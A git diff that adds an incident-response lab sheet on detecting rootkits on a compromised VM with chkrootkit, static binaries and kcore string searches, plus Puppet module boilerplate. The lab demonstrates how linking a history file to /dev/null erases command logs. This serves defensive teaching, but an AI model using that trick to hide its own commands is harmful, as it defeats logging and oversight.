+### Checking for rootkits
+
+An important concern when investigating an incident is that the system (including user-space programs, libraries, and possibly even the OS kernel) may have been modified to hide the presence of changes made by an attacker. For example, the ps and ls commands may be modified, so that certain processes and files (respectively) are not displayed. The libraries used by various commands may have been modified, so that any programs using those libraries are provided with deceptive information. If the kernel has been modified, it can essentially change the behaviour of *any* program on the system, by changing the kernel's response to instructions from processes. For example, if a program attempts to *open* a file for viewing, the kernel could provide one set of content, while an attempt to *execute* the file may result in a completely different program running.
+
+Detecting the presence of rootkits is tricky, and prone to error. However, there are a number of techniques that, while not foolproof, can detect a number of rootkits. Methods of detection include: looking for inconsistencies between different ways of gathering data about the system state, and looking for known instances of malicious files.
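
The first of these techniques can be made concrete (a sketch, not one of chkrootkit's actual tests): list process IDs straight from the /proc filesystem and compare them against what ps reports. A PID that keeps appearing in /proc but never in ps suggests the ps binary, or the kernel, is hiding it:

```shell
# PIDs according to the /proc filesystem, read directly
proc_pids=$(ls /proc | grep -E '^[0-9]+$' | sort)

# PIDs according to ps (the binary a rootkit is most likely to trojan)
ps_pids=$(ps -e -o pid= 2>/dev/null | tr -d ' ' | sort)

# PIDs visible in /proc but absent from ps output
comm -23 <(echo "$proc_pids") <(echo "$ps_pids")
```

Short-lived processes cause harmless one-off differences between the two listings; a PID that shows up here on every run is what warrants investigation.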
+
+Chkrootkit is a Bash script that performs a number of tests for the presence of various rootkits.
+
+**On the compromised VM (Redhat7.2)**, have a quick look through the script; it is much more complex than the previous linux-ir.sh script:
+
+```bash
+less /mnt/cdrom/statbins/chkrootkit-linux/chkrootkit
+```
+> Exit less
+
+Confirm that if we were to run ls, we would be running the local (dynamic) version, probably /bin/ls:
+
+```bash
+which ls
+```
+
+To understand why, look at the value of the environment variable \$PATH, which tells Bash where to look for programs:
+
+```bash
+echo $PATH
+```
+
+Set the \$PATH environment variable to use our static binaries wherever possible, so that when chkrootkit calls external programs it will (wherever possible) use the ones stored on the IR disk:
+
+```bash
+export PATH=$static:$PATH
+```
+
+Confirm that now, if we were to run ls, we would be running the static version:
+
+```bash
+which ls
+```
+
+This should report the path to our static binary on the FIRE disk.
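
The mechanism can be demonstrated in isolation, away from the lab machines (the scratch directory and stub command below are invented for illustration):

```shell
# Create a scratch directory holding a stub "ls"
mkdir -p /tmp/statbins_demo
printf '#!/bin/sh\necho "stub ls"\n' > /tmp/statbins_demo/ls
chmod +x /tmp/statbins_demo/ls

# Prepending the directory makes Bash find the stub before /bin/ls
export PATH=/tmp/statbins_demo:$PATH
hash -r                      # drop Bash's cached command locations
which ls                     # now reports /tmp/statbins_demo/ls
```

The FIRE disk setup works the same way: because $static comes first in $PATH, every command that chkrootkit shells out to resolves to the trusted static binary whenever one exists.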
+
+It is now safe to run chkrootkit[^2]:
+
+```bash
+./chkrootkit-linux/chkrootkit | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/chkrootkit_out"
+```
+> Help: you may get a message in the terminal before you type the password. You should still type the password for the script to run. The script should not take long to run.
+
+**On your Desktop VM**, have a look at the output:
+
+```bash
+less /home/<%= $main_user %>/evidence/chkrootkit_out
+```
+
+From the output, identify files or directories reported as "INFECTED", or suspicious.
+
+Also, note that the .bash_history is reportedly linked to another file.
+
+**On the compromised VM (Redhat7.2)**, investigate the Bash history:
+
+```bash
+$static/ls -la /root/.bash_history
+```
+
+What does the output mean? What does this mean for the logging of the commands run by root?
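
You can reproduce the trick harmlessly in a throwaway directory to see exactly what it does (no real history file is touched):

```shell
cd "$(mktemp -d)"                  # work in a scratch directory

ln -s /dev/null fake_history       # the attacker's trick, on a fake file

ls -la fake_history                # shows: fake_history -> /dev/null
echo "incriminating command" >> fake_history   # write is silently discarded
wc -c < fake_history               # 0 bytes: nothing was ever recorded
```

Anything the shell appends to a history file linked to /dev/null is thrown away, so root's commands leave no record.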
+
+At this stage you should be convinced that this system is definitely compromised, and infected with some form of rootkit.
+
+Save a record of your activity to your Desktop VM:
+
+```bash
+cat /tmp/evid/invst.log | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/script_log"
+```
+
+Power down the compromised system (Redhat7.2), so that we can continue analysis offline:
+
+```bash
+$static/sync; $static/sync
+```
+> If you do not know what the sync command does, on your Desktop VM, run "info coreutils 'sync invocation'" for more information.
+>
+> Tell the oVirt Virtualization Manager to force a Power Off.
+
+Why might we want to force a power off (effectively "pulling the plug"), rather than going through the normal shutdown process (by running "halt" or "shutdown")?
+
+## Offline analysis of live data collection
+
+Note that even though the bash\_history was not saved (as we discovered above), we can still recover commands that were run the last time the computer was running. This is possible by searching through the saved RAM (the kcore ELF dump we saved earlier).
+
+**On your Desktop VM**, run:
+
+```bash
+sudo -u <%= $main_user %> bash -c "strings -n 10 /home/<%= $main_user %>/evidence/kcore > /home/<%= $main_user %>/evidence/kcore_strings"
+```
+
+The above "strings" command extracts ASCII text from the binary core dump.
+
+Open the extracted strings, and look for evidence of the commands you ran before saving the kernel core dump:
+
+```bash
+less /home/<%= $main_user %>/evidence/kcore_strings
+```
+
+Now press the '/' key, and type a regex to search for commands you previously ran to collect information about the system. For example, try searching for "ssh <%= $main_user %>" (press 'n' for next).
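
grep works too, and saves the hits rather than paging through them. A sketch against an invented stand-in file (the sample lines, user name, and address are made up; run the same grep against /home/<%= $main_user %>/evidence/kcore_strings):

```shell
# Invented stand-in for kcore_strings (the real file is far larger)
printf '%s\n' \
    'random kernel text' \
    'ssh student@192.168.1.10 "cat > evidence/netstat_out"' \
    'more unrelated noise' > /tmp/kcore_sample

# Line-numbered matches for ssh commands recovered from memory
grep -n 'ssh ' /tmp/kcore_sample
```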
+
+## What's next ...
+
+In the next lab you will analyse the artifacts you have collected, to determine what has happened on the system.
+
+**Important: save the evidence you have collected, as this will be used as the basis for the next lab.**
+
+> Help: you can confirm the evidence files are present by running "ls -la /home/<%= $main_user %>/evidence" (as root if needed). Remember that these files were collected from the compromised VM, and you are now examining them from outside it.
+
+[^1]: In reality, if we *knew* the system was compromised, we would likely *leave it powered off*, and move straight to offline analysis.
+
+[^2]: Note that it would be better to not have to include \$PATH, and only use static versions. Unfortunately, FIRE does not include statically compiled versions of all of the commands that chkrootkit requires.
diff --git a/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/resources.md.erb b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/resources.md.erb
new file mode 100644
index 000000000..8b1378917
--- /dev/null
+++ b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/resources.md.erb
@@ -0,0 +1 @@
+
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/centos-7-x64.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/centos-7-x64.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..5eebdefbf
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/centos-7-x64.yml~upstream_stretch_kde_update
@@ -0,0 +1,10 @@
+HOSTS:
+ centos-7-x64:
+ roles:
+ - agent
+ - default
+ platform: el-7-x86_64
+ hypervisor: vagrant
+ box: puppetlabs/centos-7.2-64-nocm
+CONFIG:
+ type: foss
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/debian-8-x64.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/debian-8-x64.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..fef6e63ca
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/debian-8-x64.yml~upstream_stretch_kde_update
@@ -0,0 +1,10 @@
+HOSTS:
+ debian-8-x64:
+ roles:
+ - agent
+ - default
+ platform: debian-8-amd64
+ hypervisor: vagrant
+ box: puppetlabs/debian-8.2-64-nocm
+CONFIG:
+ type: foss
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/default.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/default.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..dba339c46
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/default.yml~upstream_stretch_kde_update
@@ -0,0 +1,10 @@
+HOSTS:
+ ubuntu-1404-x64:
+ roles:
+ - agent
+ - default
+ platform: ubuntu-14.04-amd64
+ hypervisor: vagrant
+ box: puppetlabs/ubuntu-14.04-64-nocm
+CONFIG:
+ type: foss
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/centos-7.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/centos-7.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..a3333aac5
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/centos-7.yml~upstream_stretch_kde_update
@@ -0,0 +1,12 @@
+HOSTS:
+ centos-7-x64:
+ platform: el-7-x86_64
+ hypervisor: docker
+ image: centos:7
+ docker_preserve_image: true
+ docker_cmd: '["/usr/sbin/init"]'
+ # install various tools required to get the image up to usable levels
+ docker_image_commands:
+ - 'yum install -y crontabs tar wget openssl sysvinit-tools iproute which initscripts'
+CONFIG:
+ trace_limit: 200
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/debian-8.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/debian-8.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..df5c31944
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/debian-8.yml~upstream_stretch_kde_update
@@ -0,0 +1,11 @@
+HOSTS:
+ debian-8-x64:
+ platform: debian-8-amd64
+ hypervisor: docker
+ image: debian:8
+ docker_preserve_image: true
+ docker_cmd: '["/sbin/init"]'
+ docker_image_commands:
+ - 'apt-get update && apt-get install -y net-tools wget locales strace lsof && echo "en_US.UTF-8 UTF-8" > /etc/locale.gen && locale-gen'
+CONFIG:
+ trace_limit: 200
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/ubuntu-14.04.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/ubuntu-14.04.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..b1efa5839
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/ubuntu-14.04.yml~upstream_stretch_kde_update
@@ -0,0 +1,12 @@
+HOSTS:
+ ubuntu-1404-x64:
+ platform: ubuntu-14.04-amd64
+ hypervisor: docker
+ image: ubuntu:14.04
+ docker_preserve_image: true
+ docker_cmd: '["/sbin/init"]'
+ docker_image_commands:
+ # ensure that upstart is booting correctly in the container
+ - 'rm /usr/sbin/policy-rc.d && rm /sbin/initctl && dpkg-divert --rename --remove /sbin/initctl && apt-get update && apt-get install -y net-tools wget && locale-gen en_US.UTF-8'
+CONFIG:
+ trace_limit: 200
diff --git a/modules/services/unix/http/apache_stretch_compatible/apache/LICENSE b/modules/services/unix/database/mysql_wheezy_compatible/mysql/LICENSE~upstream_stretch_kde_update
similarity index 100%
rename from modules/services/unix/http/apache_stretch_compatible/apache/LICENSE
rename to modules/services/unix/database/mysql_wheezy_compatible/mysql/LICENSE~upstream_stretch_kde_update
diff --git a/modules/services/unix/http/apache_stretch_compatible/apache/CONTRIBUTING.md~upstream_stretch_kde_update b/modules/services/unix/http/apache_stretch_compatible/apache/CONTRIBUTING.md~upstream_stretch_kde_update
new file mode 100644
index 000000000..990edba7e
--- /dev/null
+++ b/modules/services/unix/http/apache_stretch_compatible/apache/CONTRIBUTING.md~upstream_stretch_kde_update
@@ -0,0 +1,217 @@
+Checklist (and a short version for the impatient)
+=================================================
+
+ * Commits:
+
+ - Make commits of logical units.
+
+ - Check for unnecessary whitespace with "git diff --check" before
+ committing.
+
+ - Commit using Unix line endings (check the settings around "crlf" in
+ git-config(1)).
+
+ - Do not check in commented out code or unneeded files.
+
+ - The first line of the commit message should be a short
+ description (50 characters is the soft limit, excluding ticket
+ number(s)), and should skip the full stop.
+
+ - Associate the issue in the message. The first line should include
+ the issue number in the form "(#XXXX) Rest of message".
+
+ - The body should provide a meaningful commit message, which:
+
+ - uses the imperative, present tense: "change", not "changed" or
+ "changes".
+
+ - includes motivation for the change, and contrasts its
+ implementation with the previous behavior.
+
+ - Make sure that you have tests for the bug you are fixing, or
+ feature you are adding.
+
+ - Make sure the test suites passes after your commit:
+ `bundle exec rspec spec/acceptance` More information on [testing](#Testing) below
+
+ - When introducing a new feature, make sure it is properly
+ documented in the README.md
+
+ * Submission:
+
+ * Pre-requisites:
+
+ - Make sure you have a [GitHub account](https://github.com/join)
+
+ - [Create a ticket](https://tickets.puppet.com/secure/CreateIssue!default.jspa), or [watch the ticket](https://tickets.puppet.com/browse/) you are patching for.
+
+ * Preferred method:
+
+ - Fork the repository on GitHub.
+
+ - Push your changes to a topic branch in your fork of the
+ repository. (the format ticket/1234-short_description_of_change is
+ usually preferred for this project).
+
+ - Submit a pull request to the repository in the puppetlabs
+ organization.
+
+The long version
+================
+
+ 1. Make separate commits for logically separate changes.
+
+ Please break your commits down into logically consistent units
+ which include new or changed tests relevant to the rest of the
+ change. The goal of doing this is to make the diff easier to
+ read for whoever is reviewing your code. In general, the easier
+ your diff is to read, the more likely someone will be happy to
+ review it and get it into the code base.
+
+ If you are going to refactor a piece of code, please do so as a
+ separate commit from your feature or bug fix changes.
+
+ We also really appreciate changes that include tests to make
+ sure the bug is not re-introduced, and that the feature is not
+ accidentally broken.
+
+ Describe the technical detail of the change(s). If your
+ description starts to get too long, that is a good sign that you
+ probably need to split up your commit into more finely grained
+ pieces.
+
+ Commits which plainly describe the things which help
+ reviewers check the patch and future developers understand the
+ code are much more likely to be merged in with a minimum of
+ bike-shedding or requested changes. Ideally, the commit message
+ would include information, and be in a form suitable for
+ inclusion in the release notes for the version of Puppet that
+ includes them.
+
+ Please also check that you are not introducing any trailing
+ whitespace or other "whitespace errors". You can do this by
+ running "git diff --check" on your changes before you commit.
+
+ 2. Sending your patches
+
+ To submit your changes via a GitHub pull request, we _highly_
+ recommend that you have them on a topic branch, instead of
+ directly on "master".
+ It makes things much easier to keep track of, especially if
+ you decide to work on another thing before your first change
+ is merged in.
+
+ GitHub has some pretty good
+ [general documentation](http://help.github.com/) on using
+ their site. They also have documentation on
+ [creating pull requests](http://help.github.com/send-pull-requests/).
+
+ In general, after pushing your topic branch up to your
+ repository on GitHub, you can switch to the branch in the
+ GitHub UI and click "Pull Request" towards the top of the page
+ in order to open a pull request.
+
+
+ 3. Update the related GitHub issue.
+
+ If there is a GitHub issue associated with the change you
+ submitted, then you should update the ticket to include the
+ location of your branch, along with any other commentary you
+ may wish to make.
+
+Testing
+=======
+
+Getting Started
+---------------
+
+Our puppet modules provide [`Gemfile`](./Gemfile)s which can tell a ruby
+package manager such as [bundler](http://bundler.io/) what Ruby packages,
+or Gems, are required to build, develop, and test this software.
+
+Please make sure you have [bundler installed](http://bundler.io/#getting-started)
+on your system, then use it to install all dependencies needed for this project,
+by running
+
+```shell
+% bundle install
+Fetching gem metadata from https://rubygems.org/........
+Fetching gem metadata from https://rubygems.org/..
+Using rake (10.1.0)
+Using builder (3.2.2)
+-- 8><-- many more --><8 --
+Using rspec-system-puppet (2.2.0)
+Using serverspec (0.6.3)
+Using rspec-system-serverspec (1.0.0)
+Using bundler (1.3.5)
+Your bundle is complete!
+Use `bundle show [gemname]` to see where a bundled gem is installed.
+```
+
+NOTE some systems may require you to run this command with sudo.
+
+If you already have those gems installed, make sure they are up-to-date:
+
+```shell
+% bundle update
+```
+
+With all dependencies in place and up-to-date we can now run the tests:
+
+```shell
+% bundle exec rake spec
+```
+
+This will execute all the [rspec](http://rspec-puppet.com/) tests
+under [spec/defines](./spec/defines), [spec/classes](./spec/classes),
+and so on. rspec tests may have the same kind of dependencies as the
+module they are testing. While the module defines them in its [Modulefile](./Modulefile),
+rspec tests define them in [.fixtures.yml](./fixtures.yml).
+
+Some puppet modules also come with [beaker](https://github.com/puppetlabs/beaker)
+tests. These tests spin up a virtual machine under
+[VirtualBox](https://www.virtualbox.org/), controlling it with
+[Vagrant](http://www.vagrantup.com/) to actually simulate scripted test
+scenarios. In order to run these, you will need both of those tools
+installed on your system.
+
+You can run them by issuing the following command
+
+```shell
+% bundle exec rake spec_clean
+% bundle exec rspec spec/acceptance
+```
+
+This will now download a pre-fabricated image configured in the [default node-set](./spec/acceptance/nodesets/default.yml),
+install puppet, copy this module and install its dependencies per [spec/spec_helper_acceptance.rb](./spec/spec_helper_acceptance.rb)
+and then run all the tests under [spec/acceptance](./spec/acceptance).
+
+Writing Tests
+-------------
+
+XXX getting started writing tests.
+
+If you have commit access to the repository
+===========================================
+
+Even if you have commit access to the repository, you will still need to
+go through the process above, and have someone else review and merge
+in your changes. The rule is that all changes must be reviewed by a
+developer on the project (that did not write the code) to ensure that
+all changes go through a code review process.
+
+Having someone other than the author of the topic branch recorded as
+performing the merge is the record that they performed the code
+review.
+
+
+Additional Resources
+====================
+
+* [Getting additional help](http://puppet.com/community/get-help)
+
+* [Writing tests](https://docs.puppet.com/guides/module_guides/bgtm.html#step-three-module-testing)
+
+* [General GitHub documentation](http://help.github.com/)
+
+* [GitHub pull request documentation](http://help.github.com/send-pull-requests/)
diff --git a/modules/services/unix/http/apache_stretch_compatible/apache/Gemfile~upstream_stretch_kde_update b/modules/services/unix/http/apache_stretch_compatible/apache/Gemfile~upstream_stretch_kde_update
new file mode 100644
index 000000000..46cb2eace
--- /dev/null
+++ b/modules/services/unix/http/apache_stretch_compatible/apache/Gemfile~upstream_stretch_kde_update
@@ -0,0 +1,75 @@
+#This file is generated by ModuleSync, do not edit.
+
+source ENV['GEM_SOURCE'] || "https://rubygems.org"
+
+# Determines what type of gem is requested based on place_or_version.
+def gem_type(place_or_version)
+ if place_or_version =~ /^git:/
+ :git
+ elsif place_or_version =~ /^file:/
+ :file
+ else
+ :gem
+ end
+end
+
+# Find a location or specific version for a gem. place_or_version can be a
+# version, which is most often used. It can also be git, which is specified as
+# `git://somewhere.git#branch`. You can also use a file source location, which
+# is specified as `file://some/location/on/disk`.
+def location_for(place_or_version, fake_version = nil)
+ if place_or_version =~ /^(git[:@][^#]*)#(.*)/
+ [fake_version, { :git => $1, :branch => $2, :require => false }].compact
+ elsif place_or_version =~ /^file:\/\/(.*)/
+ ['>= 0', { :path => File.expand_path($1), :require => false }]
+ else
+ [place_or_version, { :require => false }]
+ end
+end
+
+# Used for gem conditionals
+supports_windows = false
+ruby_version_segments = Gem::Version.new(RUBY_VERSION.dup).segments
+minor_version = "#{ruby_version_segments[0]}.#{ruby_version_segments[1]}"
+
+group :development do
+ gem "puppet-module-posix-default-r#{minor_version}", :require => false, :platforms => "ruby"
+ gem "puppet-module-win-default-r#{minor_version}", :require => false, :platforms => ["mswin", "mingw", "x64_mingw"]
+ gem "puppet-module-posix-dev-r#{minor_version}", :require => false, :platforms => "ruby"
+ gem "puppet-module-win-dev-r#{minor_version}", :require => false, :platforms => ["mswin", "mingw", "x64_mingw"]
+ gem "json_pure", '<= 2.0.1', :require => false if Gem::Version.new(RUBY_VERSION.dup) < Gem::Version.new('2.0.0')
+ gem "fast_gettext", '1.1.0', :require => false if Gem::Version.new(RUBY_VERSION.dup) < Gem::Version.new('2.1.0')
+ gem "fast_gettext", :require => false if Gem::Version.new(RUBY_VERSION.dup) >= Gem::Version.new('2.1.0')
+end
+
+group :system_tests do
+ gem "puppet-module-posix-system-r#{minor_version}", :require => false, :platforms => "ruby"
+ gem "puppet-module-win-system-r#{minor_version}", :require => false, :platforms => ["mswin", "mingw", "x64_mingw"]
+ gem "beaker", *location_for(ENV['BEAKER_VERSION'] || '>= 3')
+ gem "beaker-pe", :require => false
+ gem "beaker-rspec", *location_for(ENV['BEAKER_RSPEC_VERSION'])
+ gem "beaker-hostgenerator", *location_for(ENV['BEAKER_HOSTGENERATOR_VERSION'])
+ gem "beaker-abs", *location_for(ENV['BEAKER_ABS_VERSION'] || '~> 0.1')
+end
+
+gem 'puppet', *location_for(ENV['PUPPET_GEM_VERSION'])
+
+# Only explicitly specify Facter/Hiera if a version has been specified.
+# Otherwise it can lead to strange bundler behavior. If you are seeing weird
+# gem resolution behavior, try setting `DEBUG_RESOLVER` environment variable
+# to `1` and then run bundle install.
+gem 'facter', *location_for(ENV['FACTER_GEM_VERSION']) if ENV['FACTER_GEM_VERSION']
+gem 'hiera', *location_for(ENV['HIERA_GEM_VERSION']) if ENV['HIERA_GEM_VERSION']
+
+
+# Evaluate Gemfile.local if it exists
+if File.exists? "#{__FILE__}.local"
+ eval(File.read("#{__FILE__}.local"), binding)
+end
+
+# Evaluate ~/.gemfile if it exists
+if File.exists?(File.join(Dir.home, '.gemfile'))
+ eval(File.read(File.join(Dir.home, '.gemfile')), binding)
+end
+
+# vim:ft=ruby
diff --git a/modules/services/unix/http/apache_stretch_compatible/apache/LICENSE~upstream_stretch_kde_update b/modules/services/unix/http/apache_stretch_compatible/apache/LICENSE~upstream_stretch_kde_update
new file mode 100644
index 000000000..d64569567
--- /dev/null
+++ b/modules/services/unix/http/apache_stretch_compatible/apache/LICENSE~upstream_stretch_kde_update
@@ -0,0 +1,202 @@
+
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/modules/utilities/unix/languages/java_wheezy_compatible/java/spec/spec_helper.rb b/modules/services/unix/http/apache_stretch_compatible/apache/spec/spec_helper.rb~upstream_stretch_kde_update
similarity index 100%
rename from modules/utilities/unix/languages/java_wheezy_compatible/java/spec/spec_helper.rb
rename to modules/services/unix/http/apache_stretch_compatible/apache/spec/spec_helper.rb~upstream_stretch_kde_update
diff --git a/modules/utilities/unix/audit_tools/binary_tools/binary_tools.pp b/modules/utilities/unix/audit_tools/binary_tools/binary_tools.pp
new file mode 100644
index 000000000..597673df0
--- /dev/null
+++ b/modules/utilities/unix/audit_tools/binary_tools/binary_tools.pp
@@ -0,0 +1 @@
+include binary_tools::install
